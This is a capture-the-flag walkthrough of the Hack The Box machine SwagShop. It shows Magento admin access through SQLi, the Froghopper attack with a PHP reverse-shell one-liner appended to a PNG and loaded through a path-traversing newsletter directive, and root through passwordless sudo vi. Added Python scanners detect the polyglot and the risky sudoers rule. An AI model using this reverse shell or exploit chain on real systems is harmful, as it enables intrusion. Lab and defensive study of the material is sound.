Posted: 2019/12/12 in Uncategorized

Walkthru for SwagShop

This is a detailed walk-thru for SwagShop, written by dR1PPy


Challenges like the one posed by SwagShop are some of my favorites: the ones that require a good combination of tooling skills and skill at chaining exploits.

Overall a fun box to beat up on; much thanks to ch4p for the challenge!

___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password

PS: Use root flag as password!


Port Scan All The Things!


host port proto name state info
---- ---- ----- ---- ----- ----
     22   tcp   ssh  open  OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
     80   tcp   http open  Apache httpd 2.4.18 (Ubuntu)

We quickly verify that the OpenSSH and Apache versions are not known exploitable versions and move on.
During our HTTP enumeration we find an XML file which seems to contain some credentials (possibly for the beta SwagShop).


We are also able to enumerate the framework as Magento.

Gaining User Access

After some Google searching we find an exploit which gives us access to the admin panel of the framework via an SQLi.


Once inside we can use the Magento Froghopper attack to get a shell.

First step is to enable symlinks in the settings of Magento.

System > Configuration > Advanced > Developer > Template Settings > Allow Symlinks "Yes" (Then save config)

Now we prep our shell by creating a file with the content below:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"); ?>

Now we take some random PNG file and append our PHP shell to it:

cat /tmp/shell.code >> random.png
### If the shell doesn't work, try a better reverse shell example:
cat php-reverse-shell-1.0/php-reverse-shell.php >> random.png

Now back to Magento, where we create a catalog item with our new PNG as the image logo.
Then we create a newsletter to load our code by adding the following to its body:

{{block type='core/template' template='../../../../../../media/catalog/category/dR1PPy.png'}}

Now we start our listener, then preview the newsletter template:

nc -lvp 8888 # on my local machine

Using FrogHopper Attack with PNG file worked!

(NOTE: for some reason this attack kept failing with JPG files)
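The defensive counterpart to the chain above, added here as an example (this is not code from the write-up, from Magento, or from any tool named on the page): a scanner that looks for image/PHP polyglots under the media directory and flags newsletter {{block}} directives whose template path traverses out of the theme tree. The function names, the regexes, the media path and the sample blobs are my own constructions.

```python
"""Defensive check for the Froghopper chain: find image/PHP polyglots in the
Magento media directory and newsletter directives whose template path leaves
the theme tree. Added example; not code from the write-up or from Magento."""
import re
from pathlib import Path
from typing import Dict, List, Optional

# Magic bytes of the image formats a media upload is allowed to be.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# PHP open tags: "<?php", the echo tag "<?=" and the bare short tag "<? ".
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)

# Magento {{block ... template='...'}} directive; group 1 is the template path.
BLOCK_DIRECTIVE = re.compile(
    r"\{\{\s*block\b[^}]*?\btemplate\s*=\s*['\"]([^'\"]+)['\"][^}]*\}\}",
    re.IGNORECASE,
)


def image_type(data: bytes) -> Optional[str]:
    """Return the image format implied by the magic bytes, or None."""
    for magic, name in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def php_tag_offsets(data: bytes) -> List[int]:
    """Byte offsets of every PHP open tag in the blob (any offset is bad news)."""
    return [m.start() for m in PHP_OPEN_TAG.finditer(data)]


def scan_media_bytes(data: bytes) -> Dict[str, object]:
    """A valid image header does not make a file safe: the payload in the
    write-up sits *after* the PNG data, so the whole blob is searched."""
    offsets = php_tag_offsets(data)
    return {
        "image_type": image_type(data),
        "php_tag_offsets": offsets,
        "suspicious": bool(offsets),
    }


def scan_media_dir(media_root: Path) -> List[Dict[str, object]]:
    """Scan every file under media/ (assumed: /var/www/html/media) and report hits."""
    hits = []
    for path in media_root.rglob("*"):
        if path.is_file():
            result = scan_media_bytes(path.read_bytes())
            if result["suspicious"]:
                result["path"] = str(path)
                hits.append(result)
    return hits


def risky_template_paths(body: str) -> List[str]:
    """Template paths in {{block}} directives that traverse upward, are absolute,
    or do not point at a .phtml file (the write-up's path does the first and last)."""
    risky = []
    for m in BLOCK_DIRECTIVE.finditer(body):
        template = m.group(1)
        parts = template.replace("\\", "/").split("/")
        if ".." in parts or template.startswith("/") or not template.endswith(".phtml"):
            risky.append(template)
    return risky


# Constructed samples (not captures from the box): a bare PNG header with
# padding, the same blob with a harmless PHP marker appended, and a newsletter
# body carrying the directive from the write-up next to a legitimate one.
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
POLYGLOT_PNG = CLEAN_PNG + b"<?php echo 'marker'; ?>"
NEWSLETTER_BODY = (
    "Welcome to the beta store!\n"
    "{{block type='core/template' template='../../../../../../media/catalog/category/dR1PPy.png'}}\n"
    "{{block type='core/template' template='newsletter/footer.phtml'}}\n"
)

if __name__ == "__main__":
    print("clean:   ", scan_media_bytes(CLEAN_PNG))
    print("polyglot:", scan_media_bytes(POLYGLOT_PNG))
    print("risky templates:", risky_template_paths(NEWSLETTER_BODY))
```

Two caveats: compressed image data can contain "<?" by chance, so a hit is a lead to inspect, not a verdict; and the scan only catches the file, so also confirm that Allow Symlinks is still "No" on the same settings page the write-up changes, since the chain depends on it being "Yes".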

Once we have a shell we upgrade it to a full TTY. We see /usr/bin/python3 is available, so we can get a TTY like so:

python3 -c 'import pty; pty.spawn("/bin/sh")'

We grab the user flag found in /home/haris/user.txt and proceed to escalation.

Privilege Escalation

Again we start our enumeration cycle using the standard enumeration tools.

LinEnum quickly shows us the path to root:

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*

[+] Possible sudo pwnage!

We can execute vi as root as long as the file we edit is under the /var/www/html/ directory, so we exploit this like so:

/usr/bin/vi /var/www/html/test.sh

Once in the vi editor we break out to our root shell like the Kool-Aid man:


# whoami
# cd /root/
# ls

OH Yeah!
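For the admin side of this finding, an added example (my own code, not from the write-up, LinEnum or GTFOBins): a small sudoers audit that flags exactly the pattern above, a passwordless rule for a program that can escape to a shell, combined with a wildcard argument that lets the caller choose the path. The rule grammar it parses is the subset seen in the sudo -l output, the binary list is a partial one I assembled, and the sample sudoers text is constructed.

```python
"""Audit sudoers rules for the pattern LinEnum flagged on SwagShop: a
passwordless editor with a wildcard path. Added example, not from the write-up."""
import re
from typing import Dict, List, Optional

# Programs that can start a shell or run commands from inside (partial list,
# in the spirit of the GTFOBins page the write-up cites).
SHELL_ESCAPE_BINARIES = {
    "vi", "vim", "view", "nano", "less", "more", "man",
    "awk", "find", "perl", "python", "python3",
}

# user host=(runas) TAG: TAG: cmd, cmd   (the subset of sudoers syntax needed here)
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)


def parse_rule(line: str) -> Optional[Dict[str, object]]:
    """Parse one user specification; returns None for Defaults, comments, blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = RULE.match(line)
    if not m:
        return None
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",
        "tags": {t.rstrip(":") for t in m.group("tags").split()},
        "commands": [c.strip() for c in m.group("cmds").split(",")],
    }


def audit_rule(rule: Dict[str, object]) -> List[str]:
    """Findings for one parsed rule; an empty list means nothing to report."""
    findings = []
    nopasswd = "NOPASSWD" in rule["tags"]
    noexec = "NOEXEC" in rule["tags"]
    for cmd in rule["commands"]:
        if cmd == "ALL":
            if nopasswd:
                findings.append("ALL without a password: unrestricted root")
            continue
        prog, _, args = cmd.partition(" ")
        name = prog.rsplit("/", 1)[-1]
        if nopasswd and name in SHELL_ESCAPE_BINARIES and not noexec:
            findings.append(f"{name}: passwordless and can escape to a root shell "
                            "(use sudoedit on a fixed file, or add the NOEXEC tag)")
        if any(ch in args for ch in "*?["):
            findings.append(f"{name}: wildcard argument lets the caller pick the target path")
    return findings


def audit_sudoers(text: str) -> Dict[str, List[str]]:
    """Map each offending rule line to its findings; clean lines are omitted."""
    report = {}
    for raw in text.splitlines():
        rule = parse_rule(raw)
        if rule is None:
            continue
        findings = audit_rule(rule)
        if findings:
            report[raw.strip()] = findings
    return report


# Constructed sample sudoers, modelled on the sudo -l output LinEnum showed.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset, mail_badpass
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy ALL=(root) NOPASSWD: /bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for line, findings in audit_sudoers(SAMPLE_SUDOERS).items():
        print(line)
        for finding in findings:
            print("  -", finding)
```

The systemctl line is there to show that a fixed command with fixed arguments passes cleanly; the vi line is reported twice, once for the editor and once for the wildcard, because either one on its own would be worth fixing.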


References

Magento SQLi POC
Magento Froghopper Attack
GTFOBins for the PrivEsc syntax
